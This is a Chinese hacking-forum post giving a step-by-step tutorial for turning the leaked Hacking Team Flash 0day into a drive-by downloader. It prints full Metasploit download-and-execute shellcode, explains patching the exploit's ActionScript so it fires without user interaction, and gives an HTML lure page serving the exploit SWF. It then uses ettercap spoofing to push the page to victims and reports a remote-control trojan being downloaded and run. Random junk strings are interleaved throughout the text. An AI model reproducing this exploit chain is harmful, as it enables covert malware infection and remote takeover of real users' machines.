找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1365|回复: 0
打印 上一主题 下一主题

flash 0day之手工代码修改制作下载者实例入侵演示

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:28:55 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

) i( s8 z2 J- f: f7 F1 S! q 三、flash 0day之手工代码修改制作下载者实例入侵演示 + h/ v; f0 d0 j4 C' ]; W# G

5 }0 D; |1 K: w& y3 M

p$ b) R: D! o9 t% E 利用到的工具: 8 ?( a3 m- B& {1 J' s/ Y7 f/ b8 h2 R

( F. ?8 t, s; \& a3 ?9 Z

w. o5 W9 ]3 r6 |2 m Msf 2 X9 D* ` ^, [* ]7 x

8 U( b9 \+ Y- b5 F5 \

% j1 v4 \# G1 ~5 \* U$ @! ~ Ettercap " f# l0 S0 R3 z- {; I

$ h9 z$ H2 P' Z: m c; t! G- I' S4 a

7 h! ]. O% `, ]1 L Adobe Flash CS6 ! [( @0 E; q; k) g

" X) e5 t+ K( l9 s* o

% E4 N7 q8 S1 w$ J5 ~$ V Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 : n6 I# k% g1 P7 ~! a; }2 [

. l3 [# Z9 O% \9 T2 A5 X% Y

- r( V! L% _/ P, N6 [" B) \ 下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_execshow options 5 y( [$ ]; h$ c) K. \% ^' G" w

# R4 |/ Y; ? z$ P Y$ ^6 c

2 G }* I% S" G0 z5 X a" c3 @ 如图: ' ]- O$ C0 ~0 Y: ?

! b) p; v% a5 Z/ W" q+ a. }* K

( ^- a: z. L+ k( j   $ J: N. |) ?6 k- z; l; G3 P8 ^% X

$ G6 F7 k* @$ w$ @4 s) c2 F, [, K2 M

: G' ?, \ d. C- b   % U0 y! j1 S( h7 U0 d) I/ F0 O

' @; F O: z1 N) {4 Y h8 h: H* d; n

, @; c/ Q5 z3 u1 ~2 b 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: ) u, v% s% S. c! y: x: i T

$ C; {9 T! Z) ^7 N2 P

: m/ J5 ^+ ?* e3 B- Z2 F5 J   2 T% g V8 b9 [ r# h9 f

; G' Z* T) x& j$ `- p* c3 @! a

. d3 g5 h* f/ f# r) l+ |, S   : r/ {3 r3 {4 m; Z7 I+ T+ i

; I* v5 \5 ^ t' m% S8 S. K; q

4 G. H( H' q! H 然后执行generate -t dword生成shellcode,如下: , j' \7 k7 ?5 J8 T

$ O3 C$ D3 X5 P" B# q4 H

2 \: A! o5 c0 K   - i3 f' P! l/ D

$ ?* Y8 P7 ] K3 H

9 A1 D+ L6 ]( P% D y 复制代码到文本下便于我们一会编辑flash exp,如下: 7 Y. ]: p* a) ^$ A; |3 p

! F+ [6 _9 {+ G F& ?

0 l' j% E) Z1 ]2 }& L- A0 X2 R8 N 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, # |4 c, R6 J2 R5 b7 |& {5 o' ?

2 B" ^& K7 A4 l+ _& [

; B- P7 o8 K) x b 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, 2 r, }' F O# J

+ o$ i4 ]5 Z' T j F9 N' f3 M& m

& c; X1 \) B& m" L0 K4 g3 o H! D# c 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, 5 l+ u! f# ~1 A+ h

5 D! N5 @; w+ x6 h

9 x8 H. x% P$ o1 j- X1 R: K 0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, ! d$ q8 Y" @! H! M

3 F2 l+ f8 g1 v5 s

1 Q: C9 e) L9 e) _/ p! l' U 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, ( m% W7 q. x* `% N$ t6 X

1 }% z' e* e! ]! l' f5 }

" c% T& H9 i% m& R 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, ) Z2 s Z7 }( W+ I5 f

9 T/ j( ~. L' `4 r& y

* K( l7 \, L" d 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, $ D' B* Y2 ]: g C

5 }5 [: w. [& S" {, t

p' s8 g, j- K" R- P 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, $ Z5 d# v# C/ W

C6 A/ q- J, {+ E: y

5 m1 n' v5 ?. v8 a5 ? 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, T& V. P# f9 {

' ~4 v8 Y8 p* K

3 l% I" |5 J2 Q) m$ a0 ~ 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, 7 K y; R1 R' P9 j' z9 M

: f/ U& w N, L0 q* P

+ N! G1 K! ]% q( M+ f 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, ( Q5 L- G* @5 J( [8 F$ [0 s# W

) S4 u' k2 x4 J+ X+ f1 A5 B! ]

6 O/ k0 k X& m7 }- K0 `4 _ 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, 9 ^5 k* g6 N `7 ~2 ]0 J, O }# Q

% s$ `% s ^ j4 N3 m# O

& ~* D0 `' Q% S7 F( O* q 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, * M; s; P4 h9 P1 r5 e7 ~

4 D7 w+ n0 M) d- a5 q% P: N% k8 x g- X

; ]* X+ w$ w, F. o! ] 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 . }3 i9 g& T7 P' ~/ `1 V$ }

; v# z" f2 h R0 P6 l5 S2 R4 q

, c$ J% Q |1 Q- e* x7 [( d   & w& Z' x2 e5 L' Y. @2 |

( B: G2 z5 {9 l5 K

) ^! e3 P' O% f: y) H E4 O- d3 f$ z( R   % w& C( B' K, [; M

( V, j1 @, D* y6 U

1 q5 a) p6 Q; X& @0 i/ M 下面我们来修改flash 0day exp,需要修改三个文件,分别为: : m q5 u; l5 ]/ \! f

9 y% \6 z% e* m/ J; ]1 T

9 r# R, w( C$ g, k, g1 }$ Q+ Y0 P1 }' O   ) V- x" G5 o% W$ l- W3 b

+ q/ b; A# w$ O( L

' `: ^1 @5 Q7 }1 I' x 先修改ShellWin32.as,部分源代码如图: 1 l% I. Z+ m9 n$ J" I5 y' r

. E6 S! D7 n7 X) Q. C+ l8 [

- ^$ F8 c: c) P0 D   / Q- ~: S% a6 L

- Y! Y0 Q( W" x6 q; g

: ^9 P! }6 s- ?* T- H ]3 x6 G 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下: & s: k# J# Q& m$ H2 C

' s5 M+ D4 \( Z3 x* v$ o G

! {0 l! }2 |0 A   , Q/ t8 p) L9 G" |4 E% D

. y3 `/ @1 y$ ^. Y$ Z0 q

+ Z1 h& F5 z9 q 然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图: ( o7 E7 \& b+ G+ N+ P/ _

9 I. M3 J3 P. F& J* b2 W3 |) Z

$ A# W3 \% [" P8 E7 T2 H5 P   ; [+ d% L s g, n- e

* B# D0 L3 j0 Z1 _! o' f; h

6 e, L9 f$ h) m% @6 _ 换行在后面加一句TryExpl();注意是l不是数字1,然后如图: 2 X: c- G- t$ U: g3 V5 K% ?& L

/ _" @4 G4 {$ ^9 L3 d6 ^# \! ~

. g7 |' E( ~- O   * w1 m+ p1 P! c" G* X

/ i: Y: c. q* E2 l

9 q" S/ v/ L0 I6 o& \1 G   3 F: F: ?7 I5 I; v- p

$ |4 g4 Y( f+ a

7 v# R5 h2 H$ |! [9 E3 r   ' |, b6 g* b9 ]: I. s

9 n7 p1 ]- @( M! W+ {4 m

) h) }4 C; V5 I 然后点保存,下面我们来编译一下,打开 : F$ {0 {$ P6 f0 E% R& f

' w: ^$ z, z, K3 o" @+ e; Q6 {

" X3 s. A! U6 n) I( w w% c1 s exp1.fla然后点文件-发布,看看编译没错误 8 l2 ]# S* D4 r! N; N8 @* S' R. u

2 ]$ b( ~& J! h4 \( f1 ~

; b5 z' K. [: X   4 g# s0 I; m4 B( p8 J

& k9 p# H' k! J, J$ z3 Z

( \2 U/ M: R1 Z5 @1 L. g   ) m% v, k# V& g: N% A

$ i! G7 z: M' D/ c& ^$ [; M9 n

3 e& r1 x3 Y2 e   6 Z p1 V% Q& }

F( x U% e. w' ?+ B8 p6 k

: Z/ b9 L9 h* Q: K   ! Q- Z, u0 Q7 k4 E7 |

- @6 h$ X" N: j. Z

4 y) X- V* H4 {5 v' `* D7 }: e, l3 e 然后我们把生成的 0 \" E$ i Q) V) n: ~, l# j/ t( o

; l) b' s0 ]/ e# b6 }

6 w6 {8 m2 |- p ~4 q B exp1.swf丢到kailinux /var/www/html下: - |* D9 q+ h3 Z5 E0 \

5 X8 y: N O. i; X, M" `) g9 P

* Q D8 d! t" m$ a 然后把这段代码好好编辑一下 ! u/ B: S' F8 k% Z3 a3 A7 `" V, N

" v- L* o7 Y: O: ]

6 W, G6 j, I0 S5 g8 L+ s# {7 k   & g+ L- }) o6 P$ a. L) O

$ l$ `4 I, w& R

8 C L P3 Q! C7 g1 |1 }+ F   * U, I, U3 r1 S

7 {( y7 D. x( f1 b8 D( T

, g: e5 U, `% I   3 Z0 a( R, k2 h8 e7 Q$ q6 t8 Z

% I' Z, z: k2 [/ b' P; T

0 K% @" _5 w3 W! ^- ^   5 X/ c! ~: ?6 {

; v: E: ~+ b) z) I& i

+ X }5 X$ a* @+ C- m+ ]   ' m+ ?! d$ Y6 {( A$ R

9 h1 c$ a1 j3 L; _6 t9 \% f

`6 B v: s6 o* F9 z. t   6 r4 o( ~/ B+ d- h: q. S; c1 F

R0 A7 }! ^. {1 U% F& v

* [+ \/ e* T7 b: Y. p8 a$ h <!DOCTYPE html> ) L/ [; N' B8 Q S3 ]

' j- D( \$ R' D/ M# }

2 V x) W2 x2 P# L <html> ) ~4 g: ^# V N, s) n

! P# p1 w/ u8 ~3 X) N# \

/ ]8 b& B: F, G <head> % k6 m2 ]8 v2 J2 d% Q

4 Q. g( P' `" ]2 b) W% v! Q

) Z/ r3 _- {& l" L' y7 {$ Y <meta http-equiv="Content-Type" content="text/html; , O1 k4 x( F. Z

7 K4 P4 l( i& d

1 y: P4 ?6 T9 o charset=utf-8"/> 3 [8 G b4 [$ f9 o8 w) Z) c5 n) o

4 U4 l( K! ]5 R X

6 K/ ~* t O2 t M </head> . V$ M0 G6 N5 J y0 x. O

4 ~3 C6 c( U# C/ A) N7 e

: A& m5 }% M. E <body> ' o& A, x1 Q6 e1 B- f$ H

0 X5 a* [2 ]& {

7 Z/ [) R0 [2 \- d! y <h2> Please wait, the requested page is loading...</h2> & N. E; f0 q0 f& P, J; `4 \) o

9 J: a7 v9 X" T2 G

, N6 D- G1 ~2 g- M <br> 2 N% G3 } [3 `; p+ }

0 O' \" r$ V2 {8 R

# d1 I: _! K! v1 ]2 z+ m1 `/ t <OBJECT % i9 w" w; L/ A

! N7 u7 i1 D2 d3 c

; s" V! V% L9 V0 u- r1 u classid="clsid27CDB6E-AE6D-11cf-96B8-444553540000"  WIDTH="50" HEIGHT="50" id="4"><ARAM NAME=movie : y" p* W/ v8 l% b5 H1 j. r

4 y/ g, I3 {" I5 \/ T1 f

( x, X7 j. D0 F: n" M$ n VALUE="http://192.168.0.109/exp1.swf"></OBJECT> ( [( \& @% A' I& C: c

% n( g. R% _; ?- D& [6 b* X

2 m. [5 z7 ]0 Q1 M </body> # T1 T! z, a# T& Y3 v9 N1 m

' j' {5 p' e1 h/ g

8 g2 Y. V! r/ L, T <script> : ~& m0 X+ C* c( l2 b i/ o: X

; r0 p& @7 y: S S9 h1 u

2 r) O) p' e4 D0 l! C" \5 `8 A8 ]     setTimeout(function () { , N% x! Y$ m9 u5 P6 K

! U( q- J. F- S2 S% Q# M

, |0 J! {8 x0 f4 b" P8 d2 D          % N \9 G# w( I0 E g! P

. B0 W9 z d0 n" t

. G3 l7 e$ {% E! W m3 x window.location.reload(); ) R0 W3 n* c( o

$ d8 z$ r" [ l* D# _! U- k, {

/ e+ E6 i; {( Z; z" }- g     }, 10000); 7 p1 B$ W0 U% Z! _8 g

- T- O3 L0 X l W2 [

6 h/ j! n9 t+ t: U   ! m3 w) h* z" r' J; _9 p

0 G7 ^2 M9 a- s$ M+ T* @% `

7 n$ I( H, {. m, |0 c/ e* q* K </script> 8 \" F# C9 c% q, D! h

9 s7 l& c& [5 ]4 O- f% a

) O8 d! `8 X5 _ </html> m3 A( h% }+ f b+ i

7 Q1 i: r5 n, s2 O1 o4 ^' C

9 n! u$ C" G0 a1 K: X& I   3 [2 L! i4 ~1 q( J* f

( a# [$ a! y% @8 z

7 W6 F9 ~% A i 注意:192.168.0.109kaliip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图: , V3 S" N! k1 z* ?' Q: N! C" ^9 s* V6 D

6 L2 I7 }$ Z ?0 l- q

8 c9 B6 v8 X! o6 K   * l. Z; a+ F; s+ W& E$ C, q9 a

3 b4 L- L3 y* O; A6 Y5 b9 v

3 d7 @; j7 d# w6 A% d9 p6 u   8 n w a2 s9 x' N6 O" L

3 E7 M9 O8 D! r w2 w6 {. O( ?$ s

6 h8 m5 j, F/ M& U$ h5 m   1 _! z+ B0 g4 [1 L- K' H9 d

" \ G& N' g, S

5 k% U5 F9 i8 l   : t2 m5 ~ L \! W* @

1 H" m% l0 d/ k, i% h$ z

$ Y4 h0 N+ l8 ^8 e8 u4 X N2 s   6 U }* p9 X0 ?; J/ y) u4 b

% Q5 B# w k. f8 ^' d6 d# S$ k

+ \* l5 k: T& E 下面我们用ettercap欺骗如图: ) b) E$ U3 a/ X/ {# O& U$ W

* x4 M3 j1 |3 U$ G3 n1 ]

0 E/ _( ]9 l J9 F6 w   : I& A8 }5 {% e9 t4 Z u' b# v

6 ~7 p- U1 i) l" V

2 v% h6 X& I4 ~& x3 K) M' R   , m3 t5 v& x! L

; a8 U _( Y, }) W

) Z' Y/ G# t5 }: w+ m, `5 e 下面我们随便访问个网站看看: & H; r& m0 v/ p0 X$ a# i& {( \

8 [2 H9 ?: \# Z3 f

9 j6 v: F; H( q z$ z( l# d5 K2 T U 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图: * A6 K$ E2 g0 u. ]0 F

+ | W( ?1 E; L4 L. G

$ }" A4 _# @# p3 m+ T   5 I# k) U$ n$ e- E0 C* C* `- ]7 U

1 R- K+ U. ]6 _' b

5 R0 B$ z u) ~# d* ~ 我们看另一台, ' p) G' \: Y, ~8 M

' r% \: h; P1 r' [

$ J8 X- J( ^4 H3 ]% z8 n2 r5 A 提示这个错误,说明木马是成功被下载执行了,只是由于某些原因没上线而已。。。 5 a' E7 k7 T( z) I6 H0 p( ?: T( }

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表